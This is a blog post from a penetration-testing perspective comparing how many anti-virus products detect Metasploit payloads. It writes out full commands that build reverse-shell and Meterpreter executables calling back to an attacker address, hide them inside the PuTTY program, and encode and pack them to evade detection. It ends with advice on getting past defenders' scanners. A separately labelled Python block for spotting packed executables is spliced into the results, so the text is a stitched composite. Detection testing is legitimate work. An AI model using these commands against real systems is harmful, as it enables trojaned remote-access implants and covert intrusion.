Anti-virus evasion – 1. Choosing a payload

by Jago Maniscalchi  //  February 4, 2012  //  Programming  //  1 Comment

I know a number of professional penetration testers who refuse to use Metasploit in their professional tests because of the chance it will be picked up by anti-virus systems on their client’s network. Metasploit is a known, free, hacking tool, and therefore the risk of detection is too great, they say.

We have put this premise to the test by running four popular Metasploit payloads through a number of widely used anti-virus products. The four payloads are all used to gain interactive control of a target computer running Windows:

  • Meterpreter using Reverse TCP (staged)
  • Shell using Reverse TCP (single)
  • Shell using Reverse DNS (staged)
  • Shell using Reverse HTTP (staged)

We’ve selected both a single payload (the whole payload is included in the executable) and staged payloads (the initial payload contains only the instructions needed to download the full payload). Staged payloads are often used to avoid anti-virus detection because the signature is much reduced, and static heuristic analysis can’t reveal any malicious behaviour. Dynamic heuristic analysis would, of course, spot the full payload being downloaded and executed.

We generated three forms of each of the four payloads:

  • A raw payload as a Windows exe
  • Embedded into PuTTY and encoded using Metasploit’s Shikata Ga Nai algorithm
  • Embedded into PuTTY using Shikata Ga Nai and then packed using UPX

As a control, we also ran a clean form of PuTTY through all the virus scanners in both native form and also packed using UPX.

Generation of raw payloads

Metasploit payloads can be generated at the command line using msfpayload. It can output in Windows exe format, as raw binary shellcode, and in various programming languages ready for compilation. The following executable payloads were generated:

$ msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.68 LPORT=4444 X > mrt.exe
$ msfpayload windows/shell_reverse_tcp LHOST=192.168.1.68 LPORT=4444 X > srt.exe
$ msfpayload windows/shell/reverse_tcp_dns LHOST=192.168.1.68 LPORT=4444 X > srdt.exe
$ msfpayload windows/shell/reverse_http PXHOST=192.168.1.68 LPORT=4444 X > srh.exe

Generating encoded payloads using Metasploit’s Shikata Ga Nai

The assumption behind encoded payloads is that fewer anti-virus products will pick up on them. Standard signature detection will be defeated, so the anti-virus program must either unpack the payloads statically, or run the applications dynamically in a sandbox and monitor their behaviour (i.e. heuristic scanning).

The msfencode utility can encode a raw-format payload piped from msfpayload and can also place it into a host binary, in this case the PuTTY application. The following encoded payloads were generated:

$ msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.68 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -c 3 -t exe ./putty.exe -o ./putty_mrt.exe
$ msfpayload windows/shell_reverse_tcp LHOST=192.168.1.68 LPORT=444 R | msfencode -e x86/shikata_ga_nai -c 3 -t exe ./putty.exe -o ./putty_srt.exe
$ msfpayload windows/shell/reverse_tcp_dns LHOST=192.168.1.68 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -c 3 -t exe ./putty.exe -o ./putty_srtd.exe
$ msfpayload windows/shell/reverse_http PXHOST=192.168.1.68 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -c 3 -t exe ./putty.exe -o ./putty_srh.exe

Packing with UPX

Each of the Shikata Ga Nai encoded payloads, embedded into PuTTY, was then packed using the popular UPX packer, which compresses the executable code and prepends a run-time decompressor to the executable. Like the use of Shikata Ga Nai, UPX reduces the ability of an anti-virus product to use signature detection.

Results

First, our control tests. No anti-virus products detected PuTTY as a virus. Around 8% detected the UPX packed version of PuTTY as a virus. This indicates that these products treat any UPX packed executable as malicious.

All the payloads we created were detected by at least 60% of the anti-virus products we tested. These represent a cross-section of popular free and commercial solutions currently available. Use of HTTP as a transport mechanism slightly reduced the chance of detection. Shikata Ga Nai marginally reduced the number of anti-virus products that detected the payloads, most noticeably when using staged payloads (DNS and HTTP).

Most interestingly, despite 8% of products flagging any UPX packed binary, only around 50% of the products tested detected the UPX packed payloads. Presumably only a limited number of the products we used have a UPX unpacking capability.
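The two results above illustrate the gap between a crude static signal and real unpacking. As an added example (not the article's own code or data), the following parser reads a PE section table and reports the two cheap indicators a scanner can use without unpacking: the UPX section names, which by themselves produce the false positive on clean PuTTY noted above, and section entropy, which is packer-agnostic. The PE images it checks are constructed in memory by the hypothetical build_pe helper, not taken from real binaries.

```python
import math
import struct
from collections import Counter

def build_pe(sections):
    """Assemble a minimal PE image from [(name, raw_bytes)]; constructed fixture only."""
    opt_size = 224                                    # PE32 optional header, zero-filled
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)  # e_lfanew -> PE signature at 64
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x102)
    headers, body = b"", b""
    offset = len(dos) + len(coff) + opt_size + 40 * len(sections)  # first raw section
    for name, raw in sections:
        headers += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"), len(raw),
                               0x1000, len(raw), offset, 0, 0, 0, 0, 0x60000020)
        body += raw
        offset += len(raw)
    return dos + coff + b"\0" * opt_size + headers + body

def pe_sections(data):
    """Walk the section table and return [(name, raw_section_bytes)]."""
    pe_off = struct.unpack_from("<I", data, 60)[0] if data[:2] == b"MZ" else -1
    if pe_off < 0 or data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    nsec = struct.unpack_from("<H", data, pe_off + 6)[0]         # NumberOfSections
    opt_size = struct.unpack_from("<H", data, pe_off + 20)[0]    # SizeOfOptionalHeader
    table = pe_off + 24 + opt_size
    out = []
    for i in range(nsec):
        name, _vs, _va, rsize, rptr = struct.unpack_from("<8sIIII", data, table + 40 * i)
        out.append((name.rstrip(b"\0").decode("ascii", "replace"), data[rptr:rptr + rsize]))
    return out

def entropy(buf):
    """Shannon entropy in bits per byte; compressed or encrypted data sits near 8."""
    if not buf:
        return 0.0
    return -sum(c / len(buf) * math.log2(c / len(buf)) for c in Counter(buf).values())

def packer_indicators(data, threshold=7.0):
    """UPX section names (trivially renamed, and a false positive on legitimately packed
    software) and high-entropy sections (packer-agnostic, but fires on compressed resources)."""
    secs = pe_sections(data)
    return {"upx_names": [n for n, _ in secs if n.upper().startswith("UPX")],
            "high_entropy": [n for n, raw in secs if entropy(raw) >= threshold]}

# Constructed samples: a UPX-style layout whose UPX1 section is incompressible,
# and a plain unpacked layout with low-entropy code and data.
PACKED = build_pe([("UPX0", b""), ("UPX1", bytes(range(256)) * 16), (".rsrc", b"\0" * 512)])
CLEAN = build_pe([(".text", b"\x90" * 1024 + b"\xc3"), (".data", b"\0" * 256)])
```

A product that alerts on the section name alone reproduces the 8% false-positive behaviour; one that ignores both signals has to unpack to see the payload, which is the capability the 50% result suggests many products lack.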

Conclusion

Staged payloads, embedded into a host application, and then packed with UPX, are the most effective Metasploit combinations that we tested, and were detected by only 40% of the anti-virus products in our lab.

If you want to avoid detection, a 60% success rate is not good enough. Remember, our implant was caught by 40% of the products, not 40% of the targets. Assuming the better anti-virus products have a larger market share, our 40% product failure rate could look more like an 80 or 90% detection rate on target machines.

In Part 2 of this series, we’ll examine the use of custom shellcode to evade anti-virus. Heuristic scanners are always difficult to evade because they examine the behaviour of the payload, but signature based detection systems will miss anything they don’t already know about. Writing your own unknown and unsignatured shellcode is therefore the first step towards slipping through their net.

About the Author

Jago Maniscalchi is a Cyber security consultant, though he tries to avoid the word "Cyber" at all costs. He has spent 15 years working with Information Systems and has experience in website hosting, software engineering, infrastructure management, data analysis and security assessment. Jago lives in London with his family, enough pets to start a small zoological society, and a Samsung NaviBot Robotic Vacuum Cleaner. Despite an aptitude for learning computer languages, his repeated attempts to learn Italian have resulted in spectacular failure.

Trackbacks for this post

  1. Anti-virus evasion – 2. Using custom shellcode | Digital Threat